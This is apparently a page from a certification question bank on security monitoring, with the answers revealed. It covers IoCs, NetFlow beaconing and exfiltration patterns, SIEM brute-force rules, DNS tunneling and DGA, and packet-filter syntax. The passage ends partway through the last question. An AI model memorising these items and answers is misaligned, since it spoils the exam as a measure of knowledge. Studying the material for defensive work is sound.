Courseiva

CCNA Cbrops Security Monitoring Questions

75 of 159 questions · Page 2/3 · Cbrops Security Monitoring topic · Answers revealed

76
Multi-Selecteasy

Which THREE of the following are common Indicators of Compromise (IoCs) used in threat intelligence?

Select 3 answers
A.IP addresses
B.User-agent strings
C.Port numbers
D.Domain names
E.File hashes (MD5, SHA-256)
AnswersA, D, E

IP addresses are network-layer artefacts recorded in firewall, IDS and proxy logs, letting analysts block or correlate malicious hosts. They satisfy the IoC requirement because they are observable, machine-readable evidence that a compromise may have occurred.

Why this answer

IP addresses (A) are a classic network-based IoC because threat intelligence feeds track malicious or command-and-control (C2) infrastructure by IP, allowing defenders to block or alert on traffic to known-bad hosts. Domain names (D) are equally common IoCs, used to identify malicious domains, C2 servers, and phishing sites via DNS monitoring, sinkholing, or blocklists. File hashes such as MD5 and SHA-256 (E) are host-based IoCs that uniquely identify known malicious files, enabling endpoint and antivirus tools to detect malware by exact signature.

User-agent strings (B) can be suspicious artifacts but are not typically standalone IoCs since they are trivially spoofed and highly variable, and port numbers (C) are not reliable IoCs on their own because legitimate and malicious services frequently share the same ports (e.g., 80, 443).

Exam trap

Cisco often tests the distinction between IoCs (specific, observable artifacts of an intrusion) and contextual data (like user-agent strings or port numbers) that are not reliable or specific enough to be used as standalone indicators in threat intelligence.

77
MCQhard

A SOC analyst is analyzing NetFlow data and notices a sudden spike in outbound traffic from a single internal host to an external IP address during non-business hours. The traffic volume is significantly higher than the baseline. Which suspicion is most likely?

A.The host is running a backup to cloud storage
B.The host is part of a botnet performing DDoS attack
C.Data exfiltration is occurring
D.The host is performing legitimate software updates
AnswerC

Large outbound transfers from one internal host to an external IP outside business hours, far exceeding baseline, match data exfiltration behaviour. NetFlow records volume and direction, not payload, so the anomaly itself signals possible data theft rather than scanning or denial of service, which produce different traffic patterns.

Why this answer

A sudden increase in outbound traffic to a single external IP, especially outside business hours, often indicates data exfiltration.

78
MCQeasy

A SOC analyst needs to create a SIEM correlation rule to detect a brute force attack against SSH on a server. Which of the following would be the most effective rule logic?

A.Alert when a single failed SSH login occurs.
B.Alert when more than 10 failed SSH logins from the same source IP occur within 1 minute.
C.Alert when successful SSH logins occur outside business hours.
D.Alert when multiple failed SSH logins from various IPs occur in one hour.
AnswerB

Thresholding failed SSH logins by source IP within a one-minute window captures the high-frequency, single-origin pattern characteristic of brute forcing, while the short window and IP grouping suppress unrelated sporadic failures. This matches the stem's SSH brute force scenario.

Why this answer

A brute force attack is characterized by a high volume of failed authentication attempts from a single source within a short time window. By alerting on more than 10 failed SSH logins from the same source IP within 1 minute, the rule effectively distinguishes malicious automated guessing from isolated user errors, minimizing false positives while capturing the core behavior of a brute force attempt.

Exam trap

Cisco often tests the distinction between a brute force attack (single source, high frequency) and a distributed attack (multiple sources, lower frequency per source), and candidates may incorrectly choose Option D because they conflate 'multiple IPs' with a stronger attack, missing that the question specifically asks for a brute force against SSH.

How to eliminate wrong answers

Option A is wrong because a single failed SSH login is a common benign event (e.g., typo, forgotten password) and would generate excessive false positives, failing to indicate a brute force attack. Option C is wrong because successful SSH logins outside business hours may indicate unauthorized access but do not directly detect the repeated failed attempts that define a brute force attack; this rule would miss the attack entirely. Option D is wrong because multiple failed logins from various IPs in one hour suggests a distributed attack (e.g., credential stuffing) rather than a classic brute force from a single source, and the one-hour window is too long to trigger timely response, allowing many attempts before alerting.

79
MCQmedium

A SOC analyst notices that a workstation is generating NetFlow records showing repeated outbound connections to 203.0.113.45 on port 443 at regular 60-second intervals, with each flow transferring approximately 4 KB. The destination IP has no reputation data. Which analysis approach would best determine whether this traffic represents C2 beaconing?

A.Block all outbound traffic to 203.0.113.45 at the perimeter firewall and monitor for any user complaints about lost connectivity.
B.Correlate the flow timestamps with DNS query logs and endpoint process telemetry to identify the initiating process and any associated domain resolutions.
C.Run a full antivirus scan on the workstation and review the scan results for any detected malware signatures.
D.Increase the NetFlow sampling rate on the router to capture every packet and then analyze the payload contents for malicious strings.
AnswerB

NetFlow alone shows only metadata; correlating timestamps with DNS logs and endpoint telemetry reveals the process responsible and whether it resolves a suspicious domain. This combination is the most reliable way to confirm beaconing behavior and identify the malware family or C2 infrastructure.

Why this answer

The regular 60-second interval and small, consistent transfers are classic beaconing indicators. NetFlow shows the pattern but not the cause. Correlating flow timestamps with DNS logs and endpoint process telemetry identifies the initiating process and any resolved domains, providing definitive evidence of C2 and enabling proper containment.

Exam trap

The trap here is assuming that blocking the destination IP is the best immediate action, when doing so prematurely can destroy evidence and prevent full identification of the compromised host and C2 channel.

80
MCQhard

An analyst is tuning a Cisco Firepower intrusion policy. A rule fires repeatedly with the message 'MALWARE-CNC Outbound connection to known malicious domain' against a marketing workstation. Packet capture shows the workstation resolving and connecting to a domain that the threat intelligence feed lists, but the endpoint shows no malicious process, no persistence, and the user states they clicked a link in a phishing email an hour earlier. Which action best reflects sound incident handling at this stage?

A.Suppress the rule permanently for the marketing subnet so analysts are not distracted by future alerts.
B.Close the ticket as a false positive because the endpoint security agent reported no malicious process on disk.
C.Treat the alert as a probable compromise: isolate the workstation, capture volatile data, and correlate the connection timing with the phishing email and any subsequent downloads.
D.Block the domain at the DNS layer only and continue monitoring, since blocking prevents any further harm from the connection.
AnswerC

An outbound connection to a known malicious domain from a user who just clicked a phishing link is a strong compromise signal regardless of current endpoint findings. Early malware often leaves little on disk. Isolating preserves evidence, memory capture may reveal injected code or in-memory payloads, and correlating timing with the email establishes the intrusion chain before lateral movement or credential theft occurs.

Why this answer

Network evidence of a live connection to a threat-intelligence-listed domain, occurring shortly after a user clicked a phishing link, justifies treating the workstation as potentially compromised. Endpoint scans often miss fileless or in-memory activity, so a clean disk does not clear the host. The proportionate response is containment with evidence preservation, followed by correlation across email, DNS, proxy, and endpoint telemetry to establish scope and determine whether credentials or data were affected.

Exam trap

The trap here is equating a clean endpoint scan with a clean host, when network evidence of an actual malicious connection can reflect fileless execution that disk-based tools do not detect.

81
MCQeasy

Which OSI layer is associated with protocols such as HTTP, FTP, and SMTP, and is commonly targeted by application-layer attacks?

A.Layer 2 - Data Link
B.Layer 7 - Application
C.Layer 4 - Transport
D.Layer 3 - Network
AnswerB

HTTP, FTP and SMTP are application-layer protocols operating at Layer 7, where they exchange user-facing data and commands. Application-layer attacks such as injection and cross-site scripting exploit these protocols directly, making Layer 7 the correct association.

Why this answer

HTTP, FTP, and SMTP are application-layer protocols that operate at Layer 7 of the OSI model. Application-layer attacks target this layer by exploiting vulnerabilities in the application logic, input validation, or protocol implementation, such as SQL injection, cross-site scripting (XSS), or buffer overflows in web servers.

Exam trap

Cisco often tests the misconception that HTTP and FTP are transport-layer protocols because they use TCP ports 80 and 21 respectively, but the trap is that these protocols operate at Layer 7, not Layer 4.

How to eliminate wrong answers

Option A is wrong because Layer 2 (Data Link) handles MAC addressing and frame switching, not application protocols like HTTP or FTP. Option C is wrong because Layer 4 (Transport) manages end-to-end communication with protocols like TCP and UDP, not application-specific protocols. Option D is wrong because Layer 3 (Network) is responsible for IP addressing and routing, not the application-layer services targeted by attacks.

82
MCQeasy

A junior analyst is asked to identify which type of log would best show whether a Windows workstation attempted to authenticate to a file share on another server. Which log source should the analyst consult?

A.DHCP server logs showing IP address leases.
B.Windows Security event log on the workstation, looking for logon events.
C.Firewall logs showing allowed outbound TCP port 445 traffic.
D.Syslog from the core switch showing interface status changes.
AnswerB

Windows Security event logs record logon and authentication events, including network logons to remote shares. On the workstation, events such as 4624 with logon type 3 indicate a network logon to a server share. This log source directly shows the authentication attempt and its outcome, making it the most relevant place to check.

Why this answer

Windows Security event logs on the workstation capture logon events, including network logons to remote shares. Events like 4624 with logon type 3 show that an account authenticated over the network. This is the most direct evidence of an authentication attempt to a file share.

Exam trap

The trap here is assuming that firewall logs showing allowed SMB traffic prove an authentication attempt, when they only show that a connection was permitted.

83
MCQmedium

An analyst uses Wireshark to examine network traffic and wants to see only packets that contain the string 'password'. Which type of filter should be applied?

A.Display filter
B.Protocol filter
C.Capture filter
D.BPF filter
AnswerA

Display filters in Wireshark operate on captured packets already in memory, letting analysts match payload strings such as 'password' using expressions like frame contains. Capture filters apply earlier via BPF syntax and cannot search arbitrary payload text, so they cannot satisfy this requirement.

Why this answer

A Wireshark display filter is applied after capture to narrow what is shown from already-captured packets, and it supports string matching operators like contains. The filter frame contains "password" (or tcp contains "password") is a display filter that shows only packets whose payload includes that string. Capture filters use BPF syntax and cannot perform arbitrary string matching on payload content.

Exam trap

200-201 often tests whether candidates know that string matching (contains "password") is only possible with display filters, not capture/BPF filters — picking 'capture filter' because it sounds like the pre-analysis step is the classic error.

How to eliminate wrong answers

Option B is wrong because 'protocol filter' is not a Wireshark filter category — protocols are matched within display filters (e.g., http, dns) or capture filters (e.g., tcp port 80), but there is no standalone 'protocol filter' type. Option C is wrong because a capture filter (BPF syntax) is applied before capture and cannot match arbitrary payload strings like 'password' — BPF only supports byte-offset comparisons, not string search. Option D is wrong because BPF (Berkeley Packet Filter) is the syntax used for capture filters, and it likewise cannot perform substring matching on payload content.

84
MCQmedium

A SIEM correlation rule triggers when more than 10 failed login attempts from a single source IP occur within 1 minute. This rule is designed to detect:

A.Privilege escalation
B.Malware infection
C.Brute force attack
D.DDoS attack
AnswerC

Numerous failed authentications from one IP within a minute reflect automated credential guessing, the signature of a brute-force attack. The rule's source-IP and time-window constraints detect this volume pattern rather than isolated failures or distributed attempts.

Why this answer

A brute force attack involves repeated login attempts using many password guesses. The SIEM rule specifically detects this pattern by counting failed logins from a single source IP within a short time window (1 minute). This matches the signature of an automated password guessing tool, not other attack types.

Exam trap

Cisco often tests the distinction between a brute force attack (repeated failed logins) and a DDoS attack (high traffic volume), so candidates may confuse the two because both involve high event counts from a single source.

How to eliminate wrong answers

Option A is wrong because privilege escalation involves gaining higher-level access after initial compromise, not repeated failed logins. Option B is wrong because malware infection typically involves payload delivery or execution, not a high volume of failed authentication attempts. Option D is wrong because a DDoS attack aims to overwhelm resources with traffic volume, not to guess credentials via repeated login failures.

85
MCQhard

A SOC analyst is reviewing a NetFlow record and sees that a single internal IP has communicated with multiple external IPs on port 445 (SMB) within a short time frame. Which type of activity is most likely indicated?

A.Normal file sharing activity
B.Data exfiltration over SMB
C.SMB scanning or worm propagation
D.DNS tunneling
AnswerC

One internal host contacting many external addresses on port 445 indicates SMB scanning or worm propagation seeking vulnerable shares. The fan-out pattern and SMB port distinguish it from normal file sharing, satisfying the stem's NetFlow scenario.

Why this answer

Port 445 is used by SMB for file sharing, but a single internal IP communicating with many external IPs in a short time frame is characteristic of scanning or worm propagation. Worms like EternalBlue exploit SMB vulnerabilities to spread rapidly, generating many outbound connections to random or sequential external IPs on port 445. This pattern is not typical of normal file sharing, which involves sustained connections to known servers.

Exam trap

Cisco often tests the distinction between normal traffic patterns and malicious scanning by using a single internal IP connecting to many external IPs on a specific port, where candidates may mistakenly associate SMB only with legitimate file sharing (Option A) rather than recognizing the scanning behavior.

How to eliminate wrong answers

Option A is wrong because normal file sharing activity involves consistent connections to a limited set of known file servers, not a burst of connections to many different external IPs. Option B is wrong because data exfiltration over SMB would typically involve large data transfers to a single or few external IPs, not a broad scan pattern; exfiltration focuses on stealthy extraction, not rapid propagation. Option D is wrong because DNS tunneling uses DNS queries (port 53) to encapsulate data, not SMB on port 445; the protocol and port mismatch makes this option irrelevant.

86
MCQmedium

A network security analyst is reviewing NetFlow records from a perimeter router and observes that an internal server at 172.16.5.20 has transferred approximately 4.5 GB to an external IP address in country X over the past three hours, all during non-business hours. The destination IP has no prior communication history with the organization and the traffic uses port 443. Which analysis approach would best confirm whether this represents data exfiltration?

A.Check the router's interface error counters for packet loss
B.Review the server's antivirus scan history for the past week
C.Verify the server's operating system patch level
D.Capture full packet data for the transfer and perform content inspection to identify the data being sent
AnswerD

Full packet capture with content inspection can reveal the actual payload, file types, and protocols involved in the transfer, confirming whether sensitive data is leaving the network. NetFlow alone shows volume and endpoints but not content. Capturing and inspecting the traffic, or using proxy and TLS inspection logs where decryption is possible, provides the definitive evidence needed to confirm exfiltration.

Why this answer

To confirm exfiltration, the analyst must determine what data is leaving, not just how much. Full packet capture with content inspection, or decrypted proxy and TLS logs where available, reveals file types, protocols, and payloads. NetFlow establishes the anomaly—large volume, unusual destination, off-hours timing—but content-level visibility converts suspicion into confirmation and supports incident response decisions.

Exam trap

The trap here is treating volumetric NetFlow evidence as sufficient proof of exfiltration, when confirming the exfiltration of data requires inspecting the content or metadata of the transfer itself.

87
MCQmedium

A SOC analyst is reviewing NetFlow records exported from the border router. A single internal workstation is generating a steady stream of outbound sessions to dozens of unique external IP addresses on TCP port 443, each lasting only a few seconds, every day at 02:00. No corresponding firewall denies are logged. Which security monitoring conclusion is most appropriate?

A.The router is misconfigured and is exporting duplicate flow records, which inflates the session count.
B.The workstation is most likely beaconing to a command-and-control infrastructure and should be escalated for endpoint triage.
C.This is expected behaviour for a patched workstation receiving software updates from a content delivery network.
D.The traffic is a port scan launched from the internet against the workstation and should be blocked inbound.
AnswerB

Periodic, low-volume fan-out to many distinct external hosts on a single common port is a classic beaconing signature, especially outside business hours. Because NetFlow records only metadata, the analyst cannot see payload, so the correct next step is to correlate the flows with endpoint telemetry and DNS logs before concluding compromise, but escalation is warranted.

Why this answer

Periodic outbound sessions to many distinct external hosts on a single port, occurring at a fixed hour, match the behavioural profile of malware beaconing rather than normal user or update traffic. NetFlow alone cannot confirm payload, so the analyst should pivot to DNS and endpoint data, but the pattern itself justifies escalation as a suspected command-and-control channel.

Exam trap

The trap here is assuming that traffic on TCP 443 is automatically benign because it is encrypted web traffic, when the destination diversity and timing are what actually matter.

88
MCQhard

A threat hunter reviews Cisco Umbrella DNS logs and notices repeated queries for randomly generated subdomains under a single parent domain, each resolved by a different authoritative name server. The hunter suspects DNS tunneling. Which additional artifact would most directly confirm command-and-control activity rather than legitimate DNS behavior?

A.High volume of A records with short TTL values
B.NXDOMAIN responses for nonexistent subdomains
C.TXT record responses containing long base64-encoded strings
D.Queries originating from multiple internal VLANs
AnswerC

DNS tunneling frequently uses TXT records because they can carry arbitrary data and are often permitted through firewalls. Long base64-encoded strings in TXT responses indicate that the DNS channel is transporting encoded payloads, which is a strong signal of command-and-control or exfiltration. Combined with the random subdomain pattern, this artifact directly confirms that data is being moved over DNS rather than merely resolved. Legitimate TXT records, such as SPF or DKIM, have structured formats and predictable lengths.

Why this answer

DNS tunneling moves data inside DNS queries and responses, most commonly using TXT records because they support larger payloads. Long base64-encoded strings in TXT responses, paired with random subdomains and rotating authoritative servers, show that the DNS channel is carrying encoded command-and-control or exfiltration data. This artifact distinguishes malicious tunneling from ordinary DNS resolution patterns.

Exam trap

The trap here is treating generic DNS anomalies such as short TTLs or NXDOMAIN spikes as proof of tunneling, when only encoded payload content in responses confirms data transfer.

89
Multi-Selecthard

A SOC analyst is analyzing logs from multiple sources. Which THREE log types are most useful for detecting a brute force attack against a web application?

Select 3 answers
A.DNS logs
B.System authentication logs
C.Web server logs
D.IDS/IPS alerts
E.Firewall logs
AnswersB, C, E

System authentication logs record login attempts against the underlying operating system, revealing repeated failed credential submissions from a single source. Correlating these timestamps with web activity exposes brute-force patterns targeting application accounts, satisfying the stem's requirement to identify the attack across multiple log sources.

Why this answer

System authentication logs (B) are correct because they record login attempts and failures (e.g., Windows Security Event ID 4625 or Linux /var/log/auth.log entries), which directly reveal repeated failed authentications characteristic of brute force attacks. Web server logs (C) are correct because they capture HTTP POST requests to login endpoints with status codes like 401 or 403, showing the source IP, user-agent, and request patterns of credential-guessing attempts against the application. Firewall logs (E) are correct because they record connection attempts and can reveal high-volume or repeated traffic from a single source IP to the web server's authentication port, helping identify the brute force source and rate.

DNS logs (A) are not typically useful here since brute force attacks target authentication mechanisms directly and do not necessarily generate distinctive DNS queries. IDS/IPS alerts (D) may detect some brute force activity, but they are derived alerts rather than raw log types and are not among the three most directly useful log sources for this scenario.

Exam trap

Cisco often tests the distinction between raw logs (like authentication, web server, and firewall logs) and derived alerts (like IDS/IPS alerts), tricking candidates into selecting IDS/IPS alerts because they seem directly relevant, but the question specifically asks for log types, not alert types.

90
MCQeasy

A security analyst is using a SIEM to create a correlation rule that triggers when more than 10 failed logins are detected from the same source IP within 1 minute. This rule is designed to detect which type of attack?

A.Brute-force attack
B.Phishing attack
C.Privilege escalation
D.Man-in-the-middle attack
AnswerA

More than ten failed logins from one source IP within a minute is rapid, repeated authentication failure, the defining pattern of brute-force attacks. The threshold and time window distinguish it from occasional user error or password spraying across many accounts.

Why this answer

A correlation rule that fires on more than 10 failed logins from the same source IP within 1 minute is the textbook signature of a brute-force attack — an attacker rapidly guessing credentials against an authentication endpoint. The high frequency and single-source pattern distinguish it from slow, distributed password spraying. SIEM correlation rules are commonly tuned to this threshold to catch credential-guessing attempts in near real time.

Exam trap

200-201 often tests attack-type identification from telemetry patterns; candidates may pick 'privilege escalation' because failed logins feel like an access issue, missing that the defining signal is high-volume credential guessing from one source.

How to eliminate wrong answers

Option B is wrong because phishing is a social-engineering attack delivered via email or messaging; it does not inherently generate a burst of failed logins from one IP, and detection would rely on email gateway or URL-click telemetry, not login-failure correlation. Option C is wrong because privilege escalation occurs after initial access, when an attacker elevates permissions (e.g., exploiting a misconfiguration or kernel vulnerability); it does not manifest as repeated failed authentication attempts. Option D is wrong because a man-in-the-middle attack intercepts or relays traffic between two parties and is detected via anomalous TLS certificates, ARP anomalies, or traffic redirection — not via failed-login counts.

91
MCQhard

An organization uses Zeek for network monitoring. An analyst wants to extract files transferred over HTTP from network traffic. Which Zeek script or functionality should they use?

A.Zeek's connection log
B.Zeek's HTTP log
C.Zeek's file extraction script
D.Zeek's DNS log
AnswerC

Zeek's file extraction framework reconstructs files from HTTP sessions by reassembling stream data and writing payloads to disk, satisfying the requirement to extract transferred files from captured traffic. It handles MIME types and connection tracking natively, so no packet-level manual carving is needed.

Why this answer

Zeek's file extraction script (often the File Analysis Framework or specific scripts like extract-all-files) is designed to identify and extract files from network traffic, including those transferred over HTTP. This functionality allows analysts to reconstruct files for further inspection, such as malware analysis.

Exam trap

200-201 often tests the confusion between Zeek's logging capabilities and its file extraction functionality, causing candidates to select log types that only provide metadata rather than actual file contents.

How to eliminate wrong answers

Option A is wrong because the connection log records metadata about network connections (e.g., IPs, ports, duration) but does not extract file contents. Option B is wrong because the HTTP log records HTTP request and response metadata (e.g., URIs, methods, user agents) but not the actual files transferred. Option D is wrong because the DNS log captures DNS queries and responses, which is unrelated to file extraction.

92
MCQeasy

Which of the following is a valid indicator of compromise (IoC)?

A.A file hash (MD5)
B.The company's logo
C.An employee's email address
D.A user's full name
AnswerA

A file hash such as MD5 is a concrete, machine-checkable artefact uniquely identifying known malicious files, making it a valid IoC. It satisfies the indicator requirement because hashes are observable, shareable and directly matchable against endpoint or sandbox telemetry.

Why this answer

An indicator of compromise is a forensic artifact that provides evidence a system or network has been breached. A file hash such as an MD5 (or SHA-1/SHA-256) uniquely identifies a malicious file and can be searched across endpoints and threat feeds, making it a canonical host-based IoC. Hashes, IP addresses, domain names, URLs, and registry keys are all standard IoC types used in detection and threat intelligence.

Exam trap

The 200-201 exam often tests whether candidates can distinguish a technical forensic artifact (hash, IP, domain) from a generic business or identity data point — the trap is picking an email address or name because it 'relates to a person involved in an incident.'

How to eliminate wrong answers

Option B is wrong because a company logo is a branding asset with no forensic value — it does not indicate malicious activity and cannot be used to detect a compromise. Option C is wrong because an employee's email address is an identity attribute, not evidence of compromise; while it may appear in phishing, the address itself is not an IoC. Option D is wrong because a user's full name is a directory attribute and carries no technical signal about system or network compromise.

93
Multi-Selectmedium

A security analyst is investigating a potential data exfiltration incident. Which TWO of the following are common indicators that data exfiltration may be occurring over DNS? (Choose two.)

Select 2 answers
A.DNS responses with a large number of IP addresses
B.DNS queries for AAAA records (IPv6) from an IPv4-only network
C.High volume of DNS queries to a single domain not normally visited
D.Unusually large DNS TXT record responses
E.DNS query responses with high TTL values
AnswersC, D

A high volume of DNS queries to one unusual domain signals tunnelling, where data is encoded into query names and smuggled out through the resolver. This satisfies the stem's DNS-based exfiltration indicator, since legitimate DNS traffic rarely concentrates on a single unfamiliar domain at volume.

Why this answer

Option C is correct because DNS tunneling and exfiltration tools typically generate a high volume of queries to a single attacker-controlled domain that is not normally seen in the environment, as the malware encodes stolen data into the query names and needs many requests to move the data out. Option D is correct because DNS TXT records can carry arbitrary payloads, so unusually large TXT responses are a classic sign of data being returned or acknowledged over DNS, often used by tunneling utilities like iodine or dnscat2. Options A, B, and E are not valid indicators: multiple IP addresses in a response is normal for load balancing or round-robin DNS, AAAA queries from an IPv4-only network are common on dual-stack clients and OS resolvers, and high TTL values simply reflect caching policy and have no direct relationship to exfiltration.

Exam trap

Cisco often tests the distinction between normal DNS behavior (e.g., CDN responses with many IPs) and anomalous patterns specific to tunneling, so candidates mistakenly pick A or E because they sound 'unusual' without understanding the underlying exfiltration mechanism.

94
MCQmedium

A security analyst is examining a suspicious executable and wants to extract readable strings to identify potential C2 domains or file paths. The analyst has the file on a Windows workstation and needs to use a built-in or commonly available tool. Which approach is most appropriate?

A.Open the file in Notepad and visually scan for readable text that resembles domain names.
B.Rename the file extension to .txt and open it in a web browser to view the text.
C.Use the Windows Command Prompt to run 'strings.exe' if Sysinternals Suite is installed, then search the output for domain-like patterns.
D.Use the 'type' command in Command Prompt to display the file contents and pipe to 'findstr' for domain patterns.
AnswerC

Sysinternals strings.exe is a widely used tool that extracts ASCII and Unicode strings from binary files. Running it from Command Prompt and searching for domain patterns is a standard, effective method for initial triage of a suspicious executable on Windows.

Why this answer

Sysinternals strings.exe is a standard, reliable tool for extracting ASCII and Unicode strings from binaries on Windows. It allows analysts to quickly identify potential C2 domains, file paths, and other indicators without requiring a full disassembler. Searching the output for domain-like patterns is an efficient triage step.

Exam trap

The trap here is assuming that built-in Windows commands like 'type' or Notepad can effectively extract strings from a binary, when they are not designed for that purpose and will produce unreliable results.

95
MCQeasy

A SOC analyst is reviewing Cisco Firepower intrusion event logs and notices a signature that fired with the message 'OS-COMMAND' on traffic destined to an internal web server on TCP port 80. Which type of activity does this signature most likely indicate?

A.A DNS tunneling session exfiltrating data to an external resolver
B.A brute-force authentication attempt against the web server's SSH service
C.A remote command injection attempt against a web application
D.A normal software update check initiated by the web server
AnswerC

Signatures with the 'OS-COMMAND' prefix in Cisco Firepower/SNORT rule sets are designed to detect attempts to execute operating system commands through an application, commonly via web request parameters. The traffic targeting port 80 on a web server strongly supports a command injection attempt, where an attacker tries to pass shell commands through an HTTP request to gain execution on the host.

Why this answer

An OS-COMMAND signature on HTTP traffic to a web server indicates an application-layer command injection attempt, where an attacker embeds operating system commands in a request to execute them on the target. The port and signature category align with this interpretation, making the remote command injection scenario the correct reading of the alert.

Exam trap

The trap here is assuming any high-severity alert on port 80 is web exploitation generically, rather than recognizing that the OS-COMMAND signature category specifically flags operating system command execution attempts.

96
MCQhard

During incident response, an analyst is collecting volatile evidence from a compromised Linux server that is still running. The team wants to preserve the current state of active network connections and running processes before any remediation. Which action best preserves this volatile data in a forensically sound manner?

A.Immediately power off the server to freeze memory contents for later analysis.
B.Run the antivirus scanner included with the distribution to quarantine malicious files.
C.Create a full disk image of the server before collecting any memory-resident data.
D.Capture live network connection and process information to external media before remediation.
AnswerD

Volatile data such as active sockets, process listings, and loaded modules exists only while the system runs, so it must be captured first and written to external media to avoid altering the disk. Order of volatility dictates collecting the most perishable evidence earliest. Documenting the commands and timestamps maintains forensic integrity and supports later analysis.

Why this answer

Order of volatility requires collecting the most perishable evidence first. On a live Linux server, active network connections, running processes, and memory contents will change or vanish quickly, so they must be documented and copied to external media before any disk imaging or remediation. Powering off, imaging disk first, or running scanners all destroy or alter this volatile state.

Exam trap

The trap here is assuming that powering off or imaging the disk first is the safest forensic step, when in fact those actions destroy the volatile network and process evidence that must be captured while the system is still running.

97
MCQhard

An analyst uses 'tshark -r capture.pcap -Y "http.request.method == POST"' to display only HTTP POST requests. This is an example of a:

A.Statistical filter
B.Read filter
C.Capture filter
D.Display filter
AnswerD

The -Y flag applies a Wireshark display filter, which restricts which decoded packets tshark prints without altering what was captured. Capture filters, by contrast, use BPF syntax and discard traffic at collection time, so they cannot be applied to an already-saved pcap.

Why this answer

The `-Y` flag in tshark applies a display filter, which operates on packets already read from the capture file. Display filters use a syntax based on protocol fields (e.g., `http.request.method == POST`) to show or hide packets in the output without altering the underlying capture data. This is distinct from capture filters, which discard packets at the kernel level before they are stored.

Exam trap

Cisco often tests the distinction between display filters (`-Y`) and capture filters (`-f`), trapping candidates who confuse the `-Y` flag with a capture filter because both can filter packets, but only capture filters discard data at the point of acquisition.

How to eliminate wrong answers

Option A is wrong because a statistical filter is not a standard tshark filter type; tshark offers capture, read, and display filters, but not a dedicated 'statistical filter' (statistics are generated via separate `-z` options). Option B is wrong because a read filter is applied with the `-R` flag (deprecated) or `-Y` in older contexts, but the official term for `-Y` is a display filter, and read filters are not a separate category in current Wireshark/tshark documentation. Option C is wrong because a capture filter uses the `-f` flag and BPF syntax (e.g., `tcp port 80`) to limit which packets are captured or read from a file; the `-Y` flag does not discard packets from the capture, it only filters the display.

98
MCQeasy

Which OSI layer is targeted by a TCP SYN flood attack?

A.Layer 7 - Application
B.Layer 4 - Transport
C.Layer 3 - Network
D.Layer 2 - Data Link
AnswerB

TCP operates at Layer 4, where SYN floods exhaust the connection table by sending numerous half-open handshakes. The attack targets the transport-layer three-way handshake mechanism itself, so Layer 4 is the precise target rather than the application payload or network routing.

Why this answer

A TCP SYN flood attack targets the Transport layer (Layer 4) because it exploits the TCP three-way handshake mechanism. The attacker sends a high volume of SYN packets with spoofed source IP addresses, causing the server to allocate resources for half-open connections that never complete, exhausting its connection queue.

Exam trap

Cisco often tests the distinction between the layer where the vulnerability exists (Layer 4, TCP) versus the layer where the packet is encapsulated (Layer 3, IP), leading candidates to mistakenly choose Layer 3 because the attack uses IP packets.

How to eliminate wrong answers

Option A is wrong because Layer 7 (Application) deals with application protocols like HTTP, FTP, and DNS; a SYN flood does not involve application-layer payloads or logic. Option C is wrong because Layer 3 (Network) handles IP routing and addressing; while the attack uses IP packets, the vulnerability lies in the TCP handshake at Layer 4. Option D is wrong because Layer 2 (Data Link) manages MAC addresses and frame delivery on a local network segment; a SYN flood operates above this layer, targeting TCP state management.

99
Multi-Selectmedium

A security analyst is reviewing logs to identify a potential brute force attack. Which TWO log entries would be most suspicious? (Choose TWO.)

Select 2 answers
A.Successful login from IP 10.0.0.9 after 50 failed attempts.
B.A single successful login from a known IP during business hours.
C.A failed login attempt from an external IP at 3:00 AM.
D.50 failed login attempts from IP 10.0.0.9 within 2 minutes.
E.A user changing their password after a successful login.
AnswersA, D

Fifty failed attempts followed by a success from the same IP indicates the attacker eventually guessed valid credentials, confirming a successful brute force. The preceding failures supply the attack signature, while the success shows compromise, making this entry highly suspicious.

Why this answer

Option A is correct because a successful login immediately following 50 failed attempts from the same IP (10.0.0.9) indicates a probable successful brute force or password-guessing attack, where the attacker eventually guessed valid credentials. Option D is correct because 50 failed login attempts from a single IP (10.0.0.9) within only 2 minutes is a classic high-rate authentication failure pattern consistent with automated brute force tools. Option B is not suspicious because a single successful login from a known IP during business hours matches normal, expected user behavior.

Option C is not suspicious on its own because a single failed login from an external IP at 3:00 AM could simply be a mistyped password or a legitimate off-hours attempt, lacking the volume or repetition of brute force. Option E is not suspicious because changing a password after a successful login is a routine, legitimate user action.

Exam trap

Cisco often tests the distinction between a single failed login and a pattern of repeated failures, tricking candidates into thinking any failed login is suspicious, when in fact only a high volume of failures from the same source indicates a brute force attempt.

100
MCQhard

An analyst captures traffic and sees a high number of DNS queries for random subdomains under a single domain, all returning NXDOMAIN. This pattern is typical of which malicious activity?

A.DNS cache poisoning
B.DNS amplification attack
C.DNS tunneling
D.Domain generation algorithm (DGA) activity
AnswerD

DGA malware generates large volumes of pseudo-random subdomain queries, most of which fail because only a few are pre-registered by the attacker. The NXDOMAIN responses for random subdomains under one domain precisely match this rendezvous technique.

Why this answer

D is correct because a high volume of DNS queries for random subdomains under a single domain, all returning NXDOMAIN, is a classic indicator of Domain Generation Algorithm (DGA) activity. Malware uses DGA to generate thousands of pseudo-random domain names to contact a command-and-control (C2) server; the NXDOMAIN responses indicate that the generated domains are not yet registered or have been sinkholed.

Exam trap

Cisco often tests the distinction between DGA activity and DNS tunneling by emphasizing that DGA generates random, unresolvable subdomains (NXDOMAIN), while tunneling uses structured subdomains that typically receive valid responses (e.g., TXT records) to exfiltrate data.

How to eliminate wrong answers

Option A is wrong because DNS cache poisoning (e.g., a Kaminsky attack) injects forged DNS records into a resolver's cache to redirect traffic, not generate random subdomain queries that all return NXDOMAIN. Option B is wrong because a DNS amplification attack uses open resolvers to send large responses to a victim's spoofed IP, characterized by high traffic volume and large response sizes, not by random subdomain queries with NXDOMAIN replies. Option C is wrong because DNS tunneling encodes data (e.g., exfiltrated files) within DNS queries and responses, typically using structured subdomains and receiving non-NXDOMAIN replies (e.g., TXT records), not random subdomains that all fail resolution.

101
MCQmedium

A security analyst is reviewing NetFlow records exported from a Cisco router at the internet edge. During a suspected ransomware staging window, a single internal host shows a sustained outbound flow to one external IP on TCP 443 with 4.2 GB transferred over 40 minutes, while the host's normal baseline for that destination is under 5 MB per day. No corresponding proxy log entry exists for this session. Which conclusion is best supported by these records?

A.The flow confirms a denial-of-service attack because large outbound transfers consume bandwidth and degrade availability.
B.The flow is normal because TCP 443 is reserved for HTTPS and traffic on that port is always legitimate business use.
C.The flow represents encrypted command-and-control beaconing because beaconing is identified by high byte volume on port 443.
D.The records indicate probable data exfiltration or bulk upload over TLS, because the volume and duration are anomalous for that host and bypass the monitored proxy.
AnswerD

